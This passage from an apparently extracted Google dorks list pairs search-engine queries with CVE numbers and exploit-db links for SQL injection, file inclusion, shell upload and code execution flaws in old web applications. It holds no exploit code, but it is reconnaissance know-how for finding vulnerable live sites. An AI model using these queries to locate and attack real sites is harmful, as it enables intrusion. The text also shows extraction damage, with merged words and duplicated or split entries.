Powered by BugSoftwareintext:Your CartContains

Powered by Bug Softwareintext:Your Cart Contains

BugMall Shopping Cart 2.5(SQL/XSS) Multiple RemoteVulnerabilities - CVE: 2007-3448:http://www.exploit-db.com/exploits/4103

Winn ASPGuestbook fromWinn.ws

Winn ASP Guestbook fromWinn.ws

Winn ASP Guestbook 1.01b RemoteDatabase Disclosure - CVE: 2009-4760: http://www.exploit-db.com/exploits/8596

inurl:option=com_n-forms form_id inurl:option=com_n-forms form_id

Mambo Component n-form (form_id)Blind SQL Injection:http://www.exploit-db.com/exploits/7064

intext:"English fordummies" intext:"English for dummies"

Mobilelib Gold v3 Local FileDisclosure Vulnerability - CVE: 2009-3823: http://www.exploit-db.com/exploits/9144

inurl:"com_lyftenbloggie" / "Poweredby LyftenBloggie"

inurl:"com_lyftenbloggie" /"Powered by LyftenBloggie"

Joomla Component com_lyftenbloggie1.04 Remote SQL InjectionVulnerability - CVE: 2009-4104:http://www.exploit-db.com/exploits/10238

"Powered byGGCMS" "Powered by GGCMS"

GGCMS 1.1.0 RC1 Remote CodeExecution - CVE: 2007-0804:http://www.exploit-db.com/exploits/3271

inurl:index.php?menu=showcat inurl:index.php?menu=showcat

ACG-ScriptShop (cid) Remote SQLInjection Vulnerability - CVE: 2008-4144: http://www.exploit-db.com/exploits/6364

Powered by minb Powered by minbminb 0.1.0 Remote Code Execution -CVE: 2008-7005: http://www.exploit-db.com/exploits/6432

"Powered byphpCC Beta 4.2" "Powered by phpCC Beta 4.2" phpCC 4.2 beta (base_dir) Remote File

Inclusion Vulnerability - CVE: 2006-

Page 379: Packetstorm Google Dorks List

4073: http://www.exploit-db.com/exploits/2134

inurl:index.php?menu=showcat= inurl:index.php?menu=showcat=

Alstrasoft Forum (cat) Remote SQLInjection Vulnerability - CVE: 2008-3954: http://www.exploit-db.com/exploits/6396

intext:elkagroupImage Galleryv1.0

intext:elkagroup Image Gallery v1.0

elkagroup Image Gallery 1.0 RemoteSQL Injection Vulnerability - CVE:2007-3461: http://www.exploit-db.com/exploits/4114

Powered byDigital College 1.0- Magtrb Soft 2010

Powered by Digital College 1.0 -Magtrb Soft 2010

Digital College 1.0 UploadVulnerability: http://www.exploit-db.com/exploits/12568

"powered byAMCMS3" "powered by AMCMS3"

Agares PhpAutoVideo 2.21 (articlecat)Remote SQL Injection - CVE: 2008-0262: http://www.exploit-db.com/exploits/4905

inurl:"e107_plugins/my_gallery" inurl:"e107_plugins/my_gallery"

e107 Plugin My_Gallery 2.3 ArbitraryFile Download Vulnerability - CVE:2008-1702: http://www.exploit-db.com/exploits/5308

"Powered byBIGACE 2.4" "Powered by BIGACE 2.4"

BIGACE 2.4 Multiple Remote FileInclusion Vulnerabilities - CVE: 2008-2520: http://www.exploit-db.com/exploits/5596

inurl:"/wp-content/plugins/wp-shopping-cart/"

inurl:"/wp-content/plugins/wp-shopping-cart/" Wordpress Plugin e-Commerce

intitle:"igenuswebmail login" intitle:"igenus webmail login"

iGENUS WebMail 2.0.2(config_inc.php) Remote CodeExecution - CVE: 2006-1031:http://www.exploit-db.com/exploits/1527

"Powered bywww.aspportal.net"

"Powered by www.aspportal.net"

ASPPortal Free Version (Topic_Id)Remote SQL Injection Vulnerability -CVE: 2008-5268: http://www.exploit-db.com/exploits/5775

inurl:"com_ijoomla_archive" inurl:"com_ijoomla_archive"

Joomla com_ijoomla_archive BlindSQL Injectio: http://www.exploit-db.com/exploits/8164

"Power by BlakordPortal" "Power by Blakord Portal" Blakord Portal Beta 1.3.A (all

modules) SQL Injection Vulnerability -

Page 380: Packetstorm Google Dorks List

CVE: 2007-6565: http://www.exploit-db.com/exploits/4793

"Powered byFreeWebshop" "Powered by FreeWebshop" FreeWebshop

intext:"Designedby Spaceacre" intext:"Designed by Spaceacre"

Spaceacre (SQL/XSS/HTML) InjectionVulnerabilities: http://www.exploit-db.com/exploits/12746

inurl:option=com_mv_restaurantmenumanager

inurl:option=com_mv_restaurantmenumanager

Joomla componentmv_restaurantmenumanager SQLinjection Vulnerability:http://www.exploit-db.com/exploits/12162

inurl:"com_ajaxchat" inurl:"com_ajaxchat"

Joomla Ajax Chat 1.0 remote fileinclusion - CVE: 2009-3822:http://www.exploit-db.com/exploits/9888

Powered by: AIHv2.3 Powered by: AIH v2.3

Advanced Image Hosting (AIH) 2.3(gal) Blind SQL Injection Vuln - CVE:2009-1032: http://www.exploit-db.com/exploits/8238

inurl:/macgurublog_menu/ inurl:/macgurublog_menu/

e107 Plugin BLOG Engine 2.2 (rid)Blind SQL Injection Vulnerability -CVE: 2008-2455: http://www.exploit-db.com/exploits/5604

inurl:"?page=duyurular_detay&id=" inurl:"?page=duyurular_detay&id="

Webyapar 2.0 Multiple Remote SQLInjection Vulnerabilities - CVE: 2007-4068: http://www.exploit-db.com/exploits/4224

"X-CART.Powerful PHPshopping cartsoftware"

"X-CART. Powerful PHP shoppingcart software"

X-Cart ? Multiple Remote FileInclusion Vulnerabilities - CVE: 2007-4907: http://www.exploit-db.com/exploits/4396

This site ispowered by e107,which is releasedunder the terms ofthe GNU GPLLicense.

This site is powered by e107, whichis released under the terms of theGNU GPL License.

e107 0.7.21 full Mullti (RFI/XSS)Vulnerabilities: http://www.exploit-db.com/exploits/12818

"S-CMS bymatteoiamma" "S-CMS by matteoiamma"

S-CMS 2.0b3 Multiple Local FileInclusion Vulnerabilities:http://www.exploit-db.com/exploits/8913

Page 381: Packetstorm Google Dorks List

allinurl:offers.php?id= allinurl:offers.php?id=

B2B Classic Trading Script(offers.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12532

"Powered ByHASHE" "Powered By HASHE"

HASHE! Solutions Multiple SQLInjection Vulnerabilities:http://www.exploit-db.com/exploits/11383

inurl:we_objectID= inurl:we_objectID=

webEdition CMS (we_objectID) BlindSQL Injection - CVE: 2008-4154:http://www.exploit-db.com/exploits/6281

"2009 Jorp" "2009 Jorp"

Jorp 1.3.05.09 Remote ArbitraryRemove Projects/Tasks Vulnerabilities:http://www.exploit-db.com/exploits/8752

Powered by OrbisCMS Powered by Orbis CMS

Orbis CMS 1.0 (AFD/ADF/ASU/SQL)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/9309

inurl:"index.php?edicion_id=" inurl:"index.php?edicion_id="

Delivering Digital Media CMS SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12840

inurl:"CIHUY" inurl:"CIHUY"

Joomla Component (com_joomdle)SQL Injection Vulnerability - CVE:2010-2908: http://www.exploit-db.com/exploits/14466

"/subcat.php?cate_id=" "/subcat.php?cate_id="

AJ Forum 1.0 (topic_title.php) RemoteSQL Injection - CVE: 2007-1295:http://www.exploit-db.com/exploits/3411

Powered byMarinet Powered by Marinet

Marinet cms SQL/XSS/HTMLInjection Vulnerability:http://www.exploit-db.com/exploits/12577

allinurl:clientsignup.php "classifieds"

allinurl:clientsignup.php"classifieds"

Living Local 1.1 (XSS-RFU) MultipleRemote Vulnerabilities - CVE: 2008-6530: http://www.exploit-db.com/exploits/7408

Powered byTeamCal Pro Powered by TeamCal Pro

TeamCalPro 3.1.000 MultipleRemote/Local File InclusionVulnerabilities - CVE: 2007-6553:

Page 382: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/4785

"mumbo jumbomedia" +inurl:"index.php"

"mumbo jumbo media" +inurl:"index.php"

Mumbo Jumbo Media OP4 RemoteBlind SQL Injection - CVE: 2008-6477: http://www.exploit-db.com/exploits/5440

inurl:"cal_day.php?op=day&catview="

inurl:"cal_day.php?op=day&catview="

Calendarix v0.8.20071118 SQLInjection: http://www.exploit-db.com/exploits/11443

intext:"pLink2.07" intext:"pLink 2.07"

pLink 2.07 (linkto.php id) RemoteBlind SQL Injection - CVE: 2008-4357: http://www.exploit-db.com/exploits/6449

netGitar.com -Shop v1.0 netGitar.com - Shop v1.0

Net Gitar Shopv1.0 DB DownloadVulnerability: http://www.exploit-db.com/exploits/11016

allinurl:fullview.php?tempid= allinurl:fullview.php?tempid=

Template Seller Pro 3.25 (tempid)Remote SQL Injection:http://www.exploit-db.com/exploits/12360

"Powered byScripteen FreeImage HostingScript V1.2"

"Powered by Scripteen Free ImageHosting Script V1.2"

Scripteen Free Image Hosting Script1.2 (cookie) Pass Grabber - CVE:2008-3211: http://www.exploit-db.com/exploits/6070

allinurl:casting_view.php?adnum= allinurl:casting_view.php?adnum=

Modelbook (casting_view.php) SQLInjection Vulnerability - CVE: 2010-1705: http://www.exploit-db.com/exploits/12443

www.stwc-counter.de www.stwc-counter.de STWC-Counter

[ Powered by:RadLance v7.5 ] [ Powered by: RadLance v7.5 ]

RadLance Gold 7.5 Multiple RemoteVulnerabilities - CVE: 2009-4692:http://www.exploit-db.com/exploits/9195

inurl:/jobsearchengine/ inurl:/jobsearchengine/

I-net Multi User Email Script SQLiVulnerability: http://www.exploit-db.com/exploits/14095

VevoCart ControlSystem VevoCart Control System

Asp VevoCart Control System Version3.0.4 DB Download Vulnerability:http://www.exploit-db.com/exploits/11134

inurl:"com_digifol inurl:"com_digifolio" Joomla Component com_digifolio 1.52

Page 383: Packetstorm Google Dorks List

io" (id) SQL Injection Vulnerability -CVE: 2009-3193: http://www.exploit-db.com/exploits/9534

"index.php?option=com_resman" "index.php?option=com_resman"

Joomla Component Car Manager 1.1Remote SQL Injection - CVE: 2007-1704: http://www.exploit-db.com/exploits/3564

allinurl:offers_buy.php?id= allinurl:offers_buy.php?id=

EC21 Clone 3.0 (id) SQL InjectionVulnerability - CVE: 2010-1726:http://www.exploit-db.com/exploits/12459

inurl:/jobsearchengine/ inurl:/jobsearchengine/

I-net Multi User Email Script SQLiVulnerability: http://www.exploit-db.com/exploits/14129

Powered byCMScout (c)2005CMScout Group

Powered by CMScout (c)2005CMScout Group

CMScout 2.08 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12407

"index.php?option=com_rwcards" "index.php?option=com_rwcards"

Joomla Component RWCards 2.4.3Remote SQL Injection - CVE: 2007-1703: http://www.exploit-db.com/exploits/3565

inurl:/jobsearchengine/ inurl:/jobsearchengine/

I-net Multi User Email Script SQLiVulnerability: http://www.exploit-db.com/exploits/14114

Powered byComersus v6Shopping Cart

Powered by Comersus v6 ShoppingCart

Comersus Shopping Cart v6 RemoteUser Pass: http://www.exploit-db.com/exploits/7736

intext:"Poweredby Atomic PhotoAlbum 1.1.0pre4"

intext:"Powered by Atomic PhotoAlbum 1.1.0pre4"

Atomic Photo Album 1.1.0pre4 BlindSQL Injection - CVE: 2008-4335:http://www.exploit-db.com/exploits/6574

inurl:"com_fastball" inurl:"com_fastball"

Joomla Fastball component 1.1.0-1.2SQL Injection - CVE: 2009-3443:http://www.exploit-db.com/exploits/9822

"Powered byMobPartner"inurl:"chat.php"

"Powered by MobPartner"inurl:"chat.php"

MobPartner Chat Multiple SqlInjection Vulnerabilities:http://www.exploit-db.com/exploits/11321

"index.php?option=com_news_portal" or "Powered by

"index.php?option=com_news_portal" or "Powered by iJoomla NewsPortal"

iJoomla News Portal (Itemid) RemoteSQL Injection - CVE: 2008-2676:http://www.exploit-

Page 384: Packetstorm Google Dorks List

iJoomla NewsPortal"

db.com/exploits/5761

Lebi soft ZiyaretciDefteri_v7.5 Lebi soft Ziyaretci Defteri_v7.5

Lebi soft Ziyaretci Defteri_v7.5 DBDownload Vulnerabilit - CVE: 2010-1065: http://www.exploit-db.com/exploits/11015

allinurl:offers_buy.php?id= allinurl:offers_buy.php?id=

Alibaba Clone Platinum(offers_buy.php) SQL InjectionVulnerability - CVE: 2010-1725:http://www.exploit-db.com/exploits/12468

[ Powered by:RadBids Gold v4 ] [ Powered by: RadBids Gold v4 ]

RadBIDS GOLD v4 Multiple RemoteVulnerabilities - CVE: 2009-3529:http://www.exploit-db.com/exploits/9194

"/subcat.php?cate_id=" "/subcat.php?cate_id="

AJ Auction Pro All Versions(subcat.php) Remote SQL Injection -CVE: 2007-1298: http://www.exploit-db.com/exploits/3408

"Desenvolvidopor: Fio Mental" "Desenvolvido por: Fio Mental"

Fiomental & Coolsis Backoffice MultiVulnerability: http://www.exploit-db.com/exploits/12563

"Powered byProjectCMS" "Powered by ProjectCMS"

ProjectCMS 1.0b (index.php sn)Remote SQL Injection Vulnerability -CVE: 2009-1500: http://www.exploit-db.com/exploits/8565

Powered byDorsaCms Powered by DorsaCms

DorsaCms (ShowPage.aspx) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/6810

powered by QT-cute v1.2 powered by QT-cute v1.2

QuickTalk v1.2 (Source codedisclosure) Multiple Vulnerabilities:http://www.exploit-db.com/exploits/12817

inurl:"/modules/friendfinder/" inurl:"/modules/friendfinder/" XOOPS Module Friendfinder

allinurl:forum_answer.php?que_id= allinurl:forum_answer.php?que_id=

AskMe Pro 2.1 (que_id) SQL InjectionVulnerability - CVE: 2007-4085:http://www.exploit-db.com/exploits/12372

inurl:"com_facebook" inurl:"com_facebook" Joomla com_facebook SQL Injection -

CVE: 2009-3438: http://www.exploit-

Page 385: Packetstorm Google Dorks List

db.com/exploits/9833

inurl:"com_facebook" inurl:"com_facebook"

Joomla com_facebook SQL Injection -CVE: 2009-3438: http://www.exploit-db.com/exploits/9833

inurl:/modules/kshop/ inurl:/modules/kshop/

XOOPS Module Kshop 1.17 (id)Remote SQL Injectio - CVE: 2007-1810: http://www.exploit-db.com/exploits/3626

"Jinzora MediaJukebox" "Jinzora Media Jukebox"

Jinzora 2.7 (include_path) MultipleRemote File Include Vulnerabilities -CVE: 2006-6770: http://www.exploit-db.com/exploits/3003

"Powered by EPayEnterprise"inurl:"shop.htm?cid=" |nurl:"shop.php?cid="

"Powered by EPay Enterprise"inurl:"shop.htm?cid=" |nurl:"shop.php?cid="

EPay Enterprise v4.13 (cid) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12353

"Copyright 2004easy-contentforums"

"Copyright 2004 easy-contentforums"

Easy-Content Forums 1.0 MultipleSQL/XSS Vulnerabilities - CVE: 2006-2697: http://www.exploit-db.com/exploits/1834

"Website byWebSolutions.ca" "Website by WebSolutions.ca"

WsCMS SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12813

inurl:/modules/tinyevent/ inurl:/modules/tinyevent/

XOOPS Module Tiny Event 1.01 (id)Remote SQL Injection - CVE: 2007-1811: http://www.exploit-db.com/exploits/3625

Powered by: AIHv2.1 Powered by: AIH v2.1

Advanced Image Hosting (AIH) 2.1Remote SQL Injection - CVE: 2008-2536: http://www.exploit-db.com/exploits/5601

inurl:"/modules/jobs/" inurl:"/modules/jobs/"

XOOPS Module Jobs 2.4 (cid) RemoteSQL Injection - CVE: 2007-2370:http://www.exploit-db.com/exploits/3672

Uploader desfichiers Uploader des fichiers

Service d'upload v1.0.0 Shell UploadVulnerability: http://www.exploit-db.com/exploits/10938

[ Powered Byx10media.com ] [ Powered By x10media.com ] x10 Media Adult Script 1.7 Multiple

Remote Vulnerabilities - CVE: 2009-

Page 386: Packetstorm Google Dorks List

4730: http://www.exploit-db.com/exploits/9340

inurl:/modules/camportail/ inurl:/modules/camportail/

XOOPS Module Camportail 1.1(camid) Remote SQL Injection - CVE:2007-1808: http://www.exploit-db.com/exploits/3629

inurl:"com_booklibrary" inurl:"com_booklibrary"

Joomla Book Library 1.0 file inclusion- CVE: 2009-3817: http://www.exploit-db.com/exploits/9889

inurl:"/modules/myads/" inurl:"/modules/myads/"

XOOPS Module MyAds Bug Fix2.04jp (index.php) SQL Injection -CVE: 2007-1846: http://www.exploit-db.com/exploits/3603

"Powered byNukedit" "Powered by Nukedit"

Nukedit 4.9.x Remote Create AdminExploit - CVE: 2008-5582:http://www.exploit-db.com/exploits/5192

"Ladder Scripts byhttp://www.mygamingladder.com"

"Ladder Scripts byhttp://www.mygamingladder.com"

My Gaming Ladder Combo System 7.0Remote Code Execution - CVE: 2006-2002: http://www.exploit-db.com/exploits/1707

Powered ByPHPDug version2.0.0

Powered By PHPDug version 2.0.0

PHPDug version 2.0.0 Cross SiteScripting Vulnerability:http://www.exploit-db.com/exploits/11017

allinurl:show_memorial.php?id= allinurl:show_memorial.php?id=

Memorial Web Site Script (id) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12351

intext:Powered byMobilelib Gold v3

intext:Powered by Mobilelib Goldv3

Mobilelib Gold v3 (Auth Bypass/SQL)Multiple Remote Vulnerabilities -CVE: 2009-2788: http://www.exploit-db.com/exploits/9327

"php-addressbook" "php-addressbook"

PHP-Address Book 4.0.x MultipleSQL Injection Vulnerabilities - CVE:2008-2565: http://www.exploit-db.com/exploits/9023

inurl:"com_jsjobs" inurl:"com_jsjobs"

Joomla Component com_jsjobs 1.0.5.6SQL Injection Vulnerabilities - CVE:2009-4599: http://www.exploit-db.com/exploits/10366

inurl:com_ipropert inurl:com_iproperty Joomla Component com_iproperty

Page 387: Packetstorm Google Dorks List

y 1.5.3 (id) SQL Injection Vulnerability -CVE: 2010-1721: http://www.exploit-db.com/exploits/12246

index.php?option=com_altas index.php?option=com_altas

Joomla Component altas 1.0 MultipleRemote SQL Injection:http://www.exploit-db.com/exploits/6002

inurl:"index.php?module=pnFlashGames"

inurl:"index.php?module=pnFlashGames"

PostNuke Module pnFlashGames 2.5SQL Injection Vulnerabilities - CVE:2008-2013: http://www.exploit-db.com/exploits/5500

Design by SatcomCo Design by Satcom Co

Eshopbuilde CMS SQL InjectionVulnerability - CVE: 2009-4155:http://www.exploit-db.com/exploits/10253

intitle:"ppc engineadmin login form"

intitle:"ppc engine admin loginform"

PPC Search Engine 1.61 (INC)Multiple Remote File IncludeVulnerabilities - CVE: 2007-0167:http://www.exploit-db.com/exploits/3104

"powered byAlbinator" "powered by Albinator"

Albinator 2.0.6 (Config_rootdir)Remote File Inclusion - CVE: 2006-2182: http://www.exploit-db.com/exploits/1744

inurl:"/modules/library/" inurl:"/modules/library/"

XOOPS Module Library (viewcat.php)Remote SQL Injectio - CVE: 2007-1815: http://www.exploit-db.com/exploits/3619

inurl:"/modules/repository/" inurl:"/modules/repository/"

XOOPS Module Repository(viewcat.php) Remote SQL Injection -CVE: 2007-1847: http://www.exploit-db.com/exploits/3612

index.php?option=com_vr index.php?option=com_vr

Joomla Component QuickTime VR 0.1Remote SQL Injection:http://www.exploit-db.com/exploits/5994

"BioScripts" "BioScripts"

MiniTwitter 0.2b Multiple SQLInjection Vulnerabilities - CVE: 2009-2573: http://www.exploit-db.com/exploits/8586

myAlbum-P 2.0 myAlbum-P 2.0 XOOPS Module myAlbum-P[ Software [ Software Directory Powered by Soft Direct v1.05 Multiple

Page 388: Packetstorm Google Dorks List

Directory Poweredby SoftDirec 1.05]

SoftDirec 1.05 ] Vulnerabilities: http://www.exploit-db.com/exploits/11189

powered byvBulletin 3.8.6 powered by vBulletin 3.8.6

vBulletin(R) 3.8.6 faq.php InformationDisclosure Vulnerability:http://www.exploit-db.com/exploits/14455

"By Geeklog""Created this pagein" +seconds+powered

"By Geeklog" "Created this pagein" +seconds +powered

Geeklog v1.6.0sr2 - Remote FileUpload: http://www.exploit-db.com/exploits/9855

inurl:"xampp/biorhythm.php" inurl:"xampp/biorhythm.php"

XAMPP 1.7.3 multiple vulnerabilites:http://www.exploit-db.com/exploits/15370

Powered by2532|Gigs v1.2.2 Powered by 2532|Gigs v1.2.2

2532|Gigs 1.2.2 Stable MultipleRemote Vulnerabilities - CVE: 2008-6901: http://www.exploit-db.com/exploits/7510

"Powered by bpblog 6.0" "Powered by bp blog 6.0"

BP Blog 6.0 (id) Remote Blind SQLInjection Vulnerability - CVE: 2008-2554: http://www.exploit-db.com/exploits/5705

inurl:"com_soundset" inurl:"com_soundset"

Joomla CB Resume Builder SQLInjection - CVE: 2009-3645:http://www.exploit-db.com/exploits/10064

inurl:"/modules/zmagazine/" inurl:"/modules/zmagazine/"

XOOPS Module Zmagazine 1.0(print.php) Remote SQL Injection -CVE: 2005-0725: http://www.exploit-db.com/exploits/3646

Powered byiScripts eSwap. Powered by iScripts eSwap.

iScripts eSwap v2.0 sqli and xssvulnerability: http://www.exploit-db.com/exploits/13740

"Powered byOnline Grades" "Powered by Online Grades"

Online Grades & Attendance 3.2.6Multiple Local File Inclusion Vulns -CVE: 2009-2037: http://www.exploit-db.com/exploits/8853

inurl:/modules/wflinks inurl:/modules/wflinks

XOOPS Module WF-Links 1.03 (cid)Remote SQL Injection - CVE: 2007-2373: http://www.exploit-db.com/exploits/3670

inurl:"/modules/gl inurl:"/modules/glossaire/" XOOPS Module Glossarie

Page 389: Packetstorm Google Dorks List

ossaire/"

index.php?option=com_is index.php?option=com_is

Joomla Component is 1.0.1 MultipleRemote SQL Injection:http://www.exploit-db.com/exploits/5995

inurl:"/modules/myconference/" inurl:"/modules/myconference/"

XOOPS Module MyConference 1.0(index.php) SQL Injection - CVE:2007-2737: http://www.exploit-db.com/exploits/3933

inurl:"com_gameserver" inurl:"com_gameserver"

Joomla Component com_gameserver1.0 (id) SQL Injection Vulnerability -CVE: 2009-3063: http://www.exploit-db.com/exploits/9571

Powered by NinjaDesigns This is aport of WordPress

Powered by Ninja Designs This is aport of WordPress

Ninja Blog v4.8 MultipleVulnerabilities: http://www.exploit-db.com/exploits/10991

inurl:com_annonces inurl:com_annonces

Joomla Component com_annoncesUpload Vulnerability:http://www.exploit-db.com/exploits/13748

Copyright 1999-2010 RocksaltInternational PtyLtd. All rightsreserved

Copyright 1999-2010 RocksaltInternational Pty Ltd. All rightsreserved

VP-ASP Shopping Cart 7.0 DBDownload Vulnerability:http://www.exploit-db.com/exploits/11018

inurl:"fclick.php?fid" inurl:"fclick.php?fid"

Fast Click (1.1.3 , 2.3.8) (show.php)Remote File Inclusion - CVE: 2006-2175: http://www.exploit-db.com/exploits/1740

inurl:"/modules/wfsection/" inurl:"/modules/wfsection/" http://www.exploit-

db.com/exploits/3644

Powered byForums W-Agora Powered by Forums W-Agora

W-Agora v.4.2.1 MultipleVulnerabilities: http://www.exploit-db.com/exploits/10999

intext:"phpbb -auction"inurl:"auction"

intext:"phpbb - auction"inurl:"auction"

Auction 1.3m (phpbb_root_path)Remote File Include - CVE: 2006-2245: http://www.exploit-db.com/exploits/1747

"powered byDreamAccount3.1"

"powered by DreamAccount 3.1"

DreamAccount 3.1 (auth.api.php)Remote File Include - CVE: 2006-6232: http://www.exploit-db.com/exploits/1954

Page 390: Packetstorm Google Dorks List

allinurl:"article.download.php" allinurl:"article.download.php"

Star Articles 6.0 Remote File UploadVulnerability - CVE: 2008-7076:http://www.exploit-db.com/exploits/7251

inurl:com_jp_jobs inurl:com_jp_jobs

Joomla Component com_jp_jobs 1.2.0(id) SQL Injection Vulnerability -CVE: 2010-1350: http://www.exploit-db.com/exploits/12191

intitle:admbookintitle:versionfiletype:php

intitle:admbook intitle:versionfiletype:php

Admbook 1.2.2 (X-Forwarded-For)Remote Command Execution - CVE:2006-0852: http://www.exploit-db.com/exploits/1512

"Cms.tut.su, 2009g." "Cms.tut.su, 2009 g."

CMS Chainuk 1.2 Multiple RemoteVulnerabilities - CVE: 2009-2333:http://www.exploit-db.com/exploits/9069

inurl:"com_icrmbasic" inurl:"com_icrmbasic"

Joomla IRCm Basic SQL Injection:http://www.exploit-db.com/exploits/9812

"Powered ByAqua Cms" "Powered By Aqua Cms"

Aqua CMS (username) SQL InjectionVulnerability - CVE: 2009-1317:http://www.exploit-db.com/exploits/8432

inurl:"com_jbudgetsmagic" inurl:"com_jbudgetsmagic"

Joomla com_jbudgetsmagic SQLinjection vulnerability - CVE: 2009-3332: http://www.exploit-db.com/exploits/9723

inurl:"com_soundset" inurl:"com_soundset"

Joomla Soundset 1.0 SQL Injection -CVE: 2009-3644: http://www.exploit-db.com/exploits/10067

Powered byMyPHP Forumv3.0

Powered by MyPHP Forum v3.0

MyPHP Forum 3.0 (Final) RemoteSQL Injection Vulnerability - CVE:2008-0099: http://www.exploit-db.com/exploits/4831

"Powered byCMS.GE" "Powered by CMS.GE"

Binn SBuilder (nid) Remote Blind SQLInjection Vulnerability - CVE: 2008-0253: http://www.exploit-db.com/exploits/4904

index.php?option=com_mambads index.php?option=com_mambads Mambo Component mambads

"AlumniServerproject" "AlumniServer project" AlumniServer 1.0.1 (Auth Bypass)

SQL Injection Vulnerability:

Page 391: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/9019

"Site powered byGuppY" "Site powered by GuppY"

GuppY 4.6.3 (includes.inc selskin)Remote File Inclusion Vulnerability -CVE: 2007-5844: http://www.exploit-db.com/exploits/4602

inurl:"com_surveymanager" inurl:"com_surveymanager"

Joomla com_surveymanager SQLinjection vulnerability - CVE: 2009-3325: http://www.exploit-db.com/exploits/9721

Powered by PHPF1 (Max's ImageUploader)

Powered by PHP F1 (Max's ImageUploader)

Max's Image Uploader Shell UploadVulnerability - CVE: 2010-0390:http://www.exploit-db.com/exploits/11169

inurl:"?option=com_bsadv" inurl:"?option=com_bsadv"

Joomla Boy Scout Advancement 0.3(id) SQL Injection - CVE: 2009-2290:http://www.exploit-db.com/exploits/8779

"Powered by PHPLive! v3.3" "Powered by PHP Live! v3.3"

PHP Live! 3.3 (deptid) Remote SQLInjection Vulnerability - CVE: 2009-3062: http://www.exploit-db.com/exploits/9578

Powered by PHPF1 (Max's PhotoAlbum)

Powered by PHP F1 (Max's PhotoAlbum)

Max's Photo Album Shell UploadVulnerability: http://www.exploit-db.com/exploits/11557

insite:SmarterMailEnterprise 7.1

insite: SmarterMail Enterprise 7.1

SmarterMail 7.1.3876 DirectoryTraversal Vulnerability - CVE: 2010-3486: http://www.exploit-db.com/exploits/15048

"Powered byLightNEasy" "Powered by LightNEasy"

LightNEasy 3.1.x MultipleVulnerabilite: http://www.exploit-db.com/exploits/12322

"Powered byOnline Grades" "Powered by Online Grades"

Online Grades & Attendance 3.2.6Multiple SQL Injection Vulnerabilities- CVE: 2009-2598: http://www.exploit-db.com/exploits/8844

"CopyrightKerviNet" "Copyright KerviNet"

KerviNet Forum 1.1 Multiple RemoteVulnerabilities - CVE: 2009-2326:http://www.exploit-db.com/exploits/9068

allinurl:option=com_rsmonials allinurl:option=com_rsmonials Joomla Component rsmonials Remote

Cross Site Scripting:

Page 392: Packetstorm Google Dorks List

http://www.exploit-db.com/exploits/8517

"Powered byF3Site" "Powered by F3Site"

F3Site 2.1 Remote Code Execution -CVE: 2007-0763: http://www.exploit-db.com/exploits/3255

"Powered byProjectCMS" "Powered by ProjectCMS"

ProjectCMS 1.1b Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/8608

"Powered byPunBB" "Powered by PunBB"

PunBB Extension Attachment 1.0.2SQL Injection: http://www.exploit-db.com/exploits/9849

"The MerchantProject" "The Merchant Project" The Merchant

"Developed byrbk" "Developed by rbk"

InfiniX 1.2.003 Multiple SQL InjectionVulnerabilities - CVE: 2009-2451:http://www.exploit-db.com/exploits/8558

Powered by ElvinBug TrackingServer.

Powered by Elvin Bug TrackingServer.

Elvin BTS 1.2.0 Multiple RemoteVulnerabilities - CVE: 2009-2123:http://www.exploit-db.com/exploits/8953

intitle:"DirectoryListing For /" +inurl:webdavtomcat

intitle:"Directory Listing For /" +inurl:webdav tomcat

Apache Tomcat (webdav) Remote FileDisclosure: http://www.exploit-db.com/exploits/4552

Powered ByPHPFanBase Powered By PHPFanBase

PHPFanBase 2.x (protection.php)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/2957

"Powered bywpQuiz" "Powered by wpQuiz"

wpQuiz 2.7 Multiple Remote SQLInjection Vulnerabilities - CVE: 2007-6172: http://www.exploit-db.com/exploits/4668

inurl:"com_ezine" inurl:"com_ezine"

Joomla / Mambo Componentcom_ezine v2.1 Remote File IncludeVulnerability - CVE: 2009-4094:http://www.exploit-db.com/exploits/10178

"Powered byClanTiger" "Powered by ClanTiger"

ClanTiger 1.1.1 (Auth Bypass) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/8472

Page 393: Packetstorm Google Dorks List

"Search Projects"intitle:"Theultimate projectwebsite"

"Search Projects" intitle:"Theultimate project website"

Softbiz Freelancers Script v.1 RemoteSQL Injection - CVE: 2007-6124:http://www.exploit-db.com/exploits/4660

"Powerby:RichStrongCMS"

"Power by:RichStrong CMS"

RichStrong CMS (showproduct.aspcat) Remote SQL Injection - CVE:2008-0291: http://www.exploit-db.com/exploits/4910

powered:poweredby CMS powered:powered by CMS

TinyMCE WYSIWYG Editor MultipleVulnerabilities: http://www.exploit-db.com/exploits/11358

"Powered byGrayscale Blog" "Powered by Grayscale Blog"

Grayscale Blog 0.8.0 (SecurityBypass/SQL/XSS) Multiple RemoteVulns - CVE: 2007-1432:http://www.exploit-db.com/exploits/3447

inurl:roschedule.php inurl:roschedule.php

phpScheduleIt 1.2.10 (reserve.php)Remote Code Execution - CVE: 2008-6132: http://www.exploit-db.com/exploits/6646

"PHP ProjectManagement0.8.10"

"PHP Project Management 0.8.10"

PHP Project Management 0.8.10Multiple RFI / LFI Vulnerabilities -CVE: 2007-5641: http://www.exploit-db.com/exploits/4549

inurl:com_seyret inurl:com_seyret

Joomla Seyret Video Component(com_seyret) Blind SQL Injection:http://www.exploit-db.com/exploits/14172

"download thisfree gallery atmatteobinda.com"

"download this free gallery atmatteobinda.com"

ASP Photo Gallery 1.0 Multiple SQLInjection Vulnerabilities - CVE: 2008-0256: http://www.exploit-db.com/exploits/4900

Powered by Dodo,Bubo & Misty.Feed us!

Powered by Dodo, Bubo & Misty.Feed us!

Dodo Upload Version 1.3 Upload Shell(By pass) Vulnerability:http://www.exploit-db.com/exploits/11460

Nwahy.com 2.1 ,inurl:'add-site.html'

Nwahy.com 2.1 , inurl:'add-site.html'

Nwahy Dir 2.1 Arbitrary ChangeAdmin Password: http://www.exploit-db.com/exploits/9087

inurl:index.php?option=com_jombib

inurl:index.php?option=com_jombib

